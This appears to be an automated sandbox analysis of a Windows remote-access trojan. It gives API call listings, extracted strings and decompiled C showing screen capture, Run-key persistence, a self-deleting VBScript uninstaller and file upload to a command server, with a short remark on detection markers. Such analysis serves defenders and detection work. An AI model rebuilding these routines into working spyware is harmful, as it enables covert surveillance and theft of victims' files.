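The marker set is deliberately the literal pieces the routine concatenates, so a scanner over dropped `.vbs` files in `%Temp%` catches both the wait-loop and the no-loop variants; the registry filter only looks at EventID 13 because key creation (EventID 12) for `Run` is common and not by itself interesting.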
                                        Instruction addresses covered by this listing: 0x0040824e to 0x004089a5

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                          • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                        • _wgetenv.MSVCRT ref: 004083DA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                        • exit.MSVCRT ref: 004085A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                        • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 4026913539-546584676
                                        • Opcode ID: 827a41355d81d10bbb84ac863118535abc52db941b28d1632529b42b0aaf5857
                                        • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                        • Opcode Fuzzy Hash: 827a41355d81d10bbb84ac863118535abc52db941b28d1632529b42b0aaf5857
                                        • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 62%
                                        			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
                                        				struct HDC__* _v8;
                                        				void* _v12;
                                        				struct HDC__* _v16;
                                        				int _v20;
                                        				int _v24;
                                        				int _v28;
                                        				char _v44;
                                        				intOrPtr _v50;
                                        				void* _v52;
                                        				void* _v54;
                                        				intOrPtr _v58;
                                        				char _v60;
                                        				char _v76;
                                        				intOrPtr _v80;
                                        				struct tagCURSORINFO _v96;
                                        				signed int _v102;
                                        				signed int _v104;
                                        				long _v112;
                                        				long _v116;
                                        				char _v120;
                                        				struct _ICONINFO _v140;
                                        				int _t143;
                                        				void* _t144;
                                        				signed int _t153;
                                        				long _t164;
                                        				void* _t165;
                                        				char* _t189;
                                        				signed int _t193;
                                        				void* _t214;
                                        				signed int _t222;
                                        				signed char _t224;
                                        				signed int _t225;
                                        				signed int _t242;
                                        				struct HDC__* _t245;
                                        				int _t249;
                                        				struct tagBITMAPINFO* _t250;
                                        
                                        				_t214 = 0;
                                        				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
                                        				_v16 = _t245;
                                        				_v8 = CreateCompatibleDC(_t245);
                                        				_t248 = 0x41bfc8 + _a12 * 4;
                                        				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
                                        				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
                                        				_v28 = _t143;
                                        				if(_v12 != 0 || _t143 != 0) {
                                        					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
                                        					_a12 = _t144;
                                        					if(_t144 != _t214) {
                                        						if(SelectObject(_v8, _t144) != 0) {
                                        							_v24 = _t214;
                                        							asm("stosd");
                                        							E0040FF57( *_t248,  &_v24);
                                        							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
                                        								if(_a8 != 0) {
                                        									_v96.cbSize = 0x14;
                                        									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
                                        										DeleteObject(_v140.hbmColor);
                                        										DeleteObject(_v140.hbmMask);
                                        										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
                                        										_t214 = 0;
                                        									}
                                        								}
                                        								_push( &_v120);
                                        								_t249 = 0x18;
                                        								if(GetObjectA(_a12, _t249, ??) != 0) {
                                        									_t153 = _v102 * _v104;
                                        									_t242 = 1;
                                        									if(_t153 != _t242) {
                                        										_t222 = 4;
                                        										if(_t153 > _t222) {
                                        											_t222 = 8;
                                        											if(_t153 <= _t222) {
                                        												goto L18;
                                        											}
                                        											_t222 = 0x10;
                                        											if(_t153 <= _t222) {
                                        												goto L18;
                                        											}
                                        											if(_t153 > _t249) {
                                        												_a8 = 0x20;
                                        												L28:
                                        												_push(0x28 + (_t242 << _a8) * 4);
                                        												L23:
                                        												_t250 = LocalAlloc(0x40, ??);
                                        												_t224 = _a8;
                                        												_t250->bmiHeader = 0x28;
                                        												_t250->bmiHeader.biWidth = _v116;
                                        												_t250->bmiHeader.biHeight = _v112;
                                        												_t250->bmiHeader.biPlanes = _v104;
                                        												_t250->bmiHeader.biBitCount = _v102;
                                        												if(_t224 < 0x18) {
                                        													_t193 = 1;
                                        													_t250->bmiHeader.biClrUsed = _t193 << _t224;
                                        												}
                                        												_t225 = 8;
                                        												asm("cdq");
                                        												_t250->bmiHeader.biCompression = _t214;
                                        												_t250->bmiHeader.biClrImportant = _t214;
                                        												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
                                        												_t250->bmiHeader.biSizeImage = _t164;
                                        												_t165 = GlobalAlloc(_t214, _t164);
                                        												_v12 = _t165;
                                        												if(_t165 != _t214) {
                                        													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
                                        														_v60 = 0x4d42;
                                        														_v54 = _t214;
                                        														_v52 = _t214;
                                        														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
                                        														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
                                        														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                        														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                        														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
                                        														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                        														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
                                        														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                        														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
                                        														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                        														DeleteObject(_a12);
                                        														GlobalFree(_v12);
                                        														DeleteDC(_v16);
                                        														DeleteDC(_v8);
                                        														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
                                        														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        														goto L33;
                                        													}
                                        													DeleteDC(_v16);
                                        													DeleteDC(_v8);
                                        													DeleteObject(_a12);
                                        													GlobalFree(_v12);
                                        													_t189 =  &_a11;
                                        												} else {
                                        													DeleteDC(_v16);
                                        													DeleteDC(_v8);
                                        													DeleteObject(_a12);
                                        													_t189 =  &_a11;
                                        												}
                                        												goto L31;
                                        											}
                                        											_a8 = _t249;
                                        											_push(0x28);
                                        											goto L23;
                                        										}
                                        										L18:
                                        										_a8 = _t222;
                                        										goto L28;
                                        									}
                                        									_a8 = _t242;
                                        									goto L28;
                                        								} else {
                                        									DeleteDC(_v16);
                                        									DeleteDC(_v8);
                                        									DeleteObject(_a12);
                                        									_t189 =  &_a11;
                                        									goto L31;
                                        								}
                                        							}
                                        							DeleteDC(_v16);
                                        							DeleteDC(_v8);
                                        							DeleteObject(_a12);
                                        							_t189 =  &_a11;
                                        							goto L31;
                                        						}
                                        						DeleteDC(_t245);
                                        						DeleteDC(_v8);
                                        						DeleteObject(_a12);
                                        						_t189 =  &_a11;
                                        						goto L31;
                                        					}
                                        					DeleteDC(_t245);
                                        					DeleteDC(_v8);
                                        					DeleteObject(_t214);
                                        					_t189 =  &_a11;
                                        					goto L31;
                                        				} else {
                                        					_t189 =  &_a11;
                                        					L31:
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
                                        					L33:
                                        					return _a4;
                                        				}
                                        			}

                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                        • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FECE: GetMonitorInfoW.USER32(?,?), ref: 0040FEEE
                                          • Part of subcall function 0040FF18: GetMonitorInfoW.USER32(0040FA91,?), ref: 0040FF38
                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                        • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                        • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                        • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                        • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                        • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                        • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                        • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                        • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                        • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                        • GlobalFree.KERNEL32 ref: 0040FDCA
                                        • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                        • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CompatibleInfoMonitor$BitmapFreeGlobalSelect
                                        • String ID: $BM$DISPLAY
                                        • API String ID: 585525397-871886180
                                        • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                        • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                        • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                        • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                        • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                        • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                        • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                        • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                        • String ID: Uploading file to C&C: $[INFO]
                                        • API String ID: 368904453-3151135581
                                        • Opcode ID: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                        • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                        • Opcode Fuzzy Hash: 224b92aadd56f424a53dfcedfad1aadc41be9b22454acd92ca5d3e193073ddb9
                                        • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                        • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                        • API String ID: 1820998543-3714951968
                                        • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                        • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                        • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                        • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • exit.MSVCRT ref: 0040A97F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                        • exit.MSVCRT ref: 0040A9A9
                                        • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                        • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                        • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                        • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
